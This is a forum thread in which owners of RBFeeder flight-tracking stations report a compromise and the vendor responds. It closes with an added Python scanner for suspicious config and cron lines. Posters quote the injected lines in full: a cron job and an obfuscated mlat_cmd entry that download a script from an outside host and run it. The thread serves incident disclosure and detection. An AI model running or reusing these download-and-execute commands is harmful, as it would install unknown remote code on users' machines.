AirNav Radar
Recent Posts

1
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by bishoptf on Today at 09:16:10 PM »
Dear All,

We became aware of this issue earlier today and have initiated a thorough investigation, which is currently ongoing. In the meantime, we have implemented measures to prevent any further impact.

To clarify, the RbFeeder repositories themselves have not been infected with any virus. However, there was an attempt to modify certain .ini configuration files. We have identified a small number of feeder stations that were affected, and we have already taken steps to close the vulnerability that allowed this to occur.

We will be contacting the impacted stations directly to assist with clearing and reinstalling RbFeeder as needed. Further updates will be provided as more information becomes available.

I think we should have more details as to what really happened. You say the repos were not compromised, then how did rbfeeder.ini files have additional information to download files and execute? I will not continue to feed unless full disclosure and how you plan to mitigate this in the future....
2
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by AirNav Support on Today at 07:37:06 PM »
Dear All,

We became aware of this issue earlier today and have initiated a thorough investigation, which is currently ongoing. In the meantime, we have implemented measures to prevent any further impact.

To clarify, the RbFeeder repositories themselves have not been infected with any virus. However, there was an attempt to modify certain .ini configuration files. We have identified a small number of feeder stations that were affected, and we have already taken steps to close the vulnerability that allowed this to occur.

We will be contacting the impacted stations directly to assist with clearing and reinstalling RbFeeder as needed. Further updates will be provided as more information becomes available.
3
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by bishoptf on Today at 07:00:58 PM »
Looks like there is a rbfeeder user that has these cron jobs:

*/1 * * * * if ! pgrep rbfeeder-mlat > /dev/null; then wget --read-timeout=5 --tries=2 -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi
*/5 * * * * rm /tmp/.ICE-unix/rbfeeder.sh

I have uploaded rbfeeder.sh to VirusTotal; ESET identifies it as riskware, not sure if it's a false positive:

Security vendors' analysis
ESET-NOD32: A Variant Of Linux/Riskware.Frp.V
Acronis (Static ML): Undetected

This is really bad that this has happened and nothing from AirNav relating to what caused this much less to notify the community that may be running the rbfeeder software...
4
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by bishoptf on Today at 06:37:46 PM »
Is this normal, I am looking through my logs and see this call out:

Jul 18 13:32:02 adsbpi CRON[14945]: (rbfeeder) CMD (if ! pgrep rbfeeder-mlat > /dev/null; then wget --read-timeout=5 --tries=2 -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi)

Really need someone from AirNav developers to say wth is going on with their software, I traced both IPs that were used and somehow rbfeeder.ini had been modified. Both IP ranges do not belong to AirNav.
5
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by Runway 31 on Today at 04:33:18 PM »
I have passed details of this thread on to Developers

Alan
6
AirNav Radar Discussion / FAO Rod.
« Last post by Bob SEN1 on Today at 02:48:27 PM »
Hi Rod

do we have a sil for a Tipsy Belair (TIPB) please bud..... or is there one already somewhere?

Cheers

Bob.
7
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by abcd567 on Today at 01:41:14 PM »
@abcd567 how do we get in touch with anyone at AirNav Systems?

Send email to support:
[email protected]

8
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by bishoptf on Today at 12:40:41 PM »
I'm currently running clamav to see if it picks up anything....beyond p'od about this....again @abcd567 how do we get in touch with anyone at AirNav Systems?
9
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by bishoptf on Today at 11:38:25 AM »
We need someone from AirNav to weigh in on this, I had this happen to my feeder on Monday...This device has been running for 5+ years and I have not loaded or updated anything on it in almost a year and then I had this issue. If RBfeeder program downloads updates automatically and I believe it does, someone needs to explain what has happened and I am starting to think that I need to wipe my feeder and reload since I have no idea what this code downloaded and was running.

This is a huge failure on AirNav and until someone can explain what happened I have lost all trust in them as a company.
10
AirNav Radar Discussion / Re: RBFeeder multiple errors
« Last post by abcd567 on Today at 11:03:48 AM »
When did you get to monitor your Raspberry Pi's communication?
Try it, I'm sure you'll be surprised by the results.
I'm almost certain that no user will notice what's going on behind the scenes on their Raspberry Pi.
I'm almost 100% sure that this is the result of Radarbox feeder.
I've now reinstalled Raspberry Pi with only FR24 feeder, and I continue to monitor the system.

Do you recognize this line that was added to the rbfeeder.ini file?

Code:
[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

mlat_cmd=bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://8.211.7.190/e48/a${IF>

[dump978]
#dump978_enabled=false

And by the way, I'm sure it's not a virus because as I wrote, it happened recently on 3 different devices of mine and 2 of my friends who are in different cities.

You are not the only one who has this viral line written under [mlat] in file rbfeeder.ini. Please see the recent post in FlightRadar24 linked below.
It seems recent version of rbfeeder was infected with a virus, and anyone who installed rbfeeder using that infected .deb package got the viral line in file rbfeeder.ini under [mlat]


https://forum.flightradar24.com/forum/radar-forums/flightradar24-feeding-data-to-flightradar24/229522-rpi-issues?p=229567#post229567
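
An added example, not code from any poster or from AirNav: a heuristic check a feeder owner could run over the contents of rbfeeder.ini and over the rbfeeder user's crontab listing, looking for the traits visible in the two lines quoted in the posts above (a fetch tool, `${IFS}` standing in for spaces, a temp-directory path, certificate checks switched off). The function names, the two-indicator threshold and the `example.invalid` sample host are assumptions made for illustration.

```python
import re

FETCH = re.compile(r"\b(wget|curl)\b")
TEMP_PATH = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/)\S+")
NO_TLS = re.compile(r"--no-check-certificate|\bcurl\b.*\s(-k|--insecure)\b")

def reasons(cmd):
    """Why a command string looks like a download-and-run stub (empty if it does not)."""
    checks = [
        (FETCH.search(cmd), "fetches remote content"),
        ("${IFS}" in cmd, "uses ${IFS} in place of spaces"),
        (TEMP_PATH.search(cmd), "uses a world-writable temp path"),
        (NO_TLS.search(cmd), "disables TLS certificate checks"),
    ]
    return [label for hit, label in checks if hit]

def scan_ini(text):
    """Flag active (uncommented) mlat_cmd values in the [mlat] section."""
    findings, section = [], None
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if s.startswith("[") and s.endswith("]"):
            section = s[1:-1].lower()
        elif section == "mlat" and not s.startswith(("#", ";")) and "=" in s:
            key, value = s.split("=", 1)
            if key.strip() == "mlat_cmd" and reasons(value):
                findings.append((n, reasons(value)))
    return findings

def scan_cron(text, threshold=2):
    """Flag non-comment crontab lines matching at least `threshold` indicators."""
    rows = [(n, l.strip()) for n, l in enumerate(text.splitlines(), 1)]
    return [(n, reasons(s)) for n, s in rows
            if s and not s.startswith("#") and len(reasons(s)) >= threshold]

# Constructed samples (placeholder host, not the values from the posts).
SAMPLE_INI = """[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client
mlat_cmd=/bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://example.invalid/a
"""
SAMPLE_CRON = """# m h dom mon dow command
*/1 * * * * wget -O /tmp/.x/job.sh https://example.invalid/job.sh --no-check-certificate && /tmp/.x/job.sh
0 3 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
"""
if __name__ == "__main__":
    print(scan_ini(SAMPLE_INI), scan_cron(SAMPLE_CRON))
```

Each finding is a (line number, reasons) pair; a clean result from a heuristic like this does not show that a feeder was unaffected.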
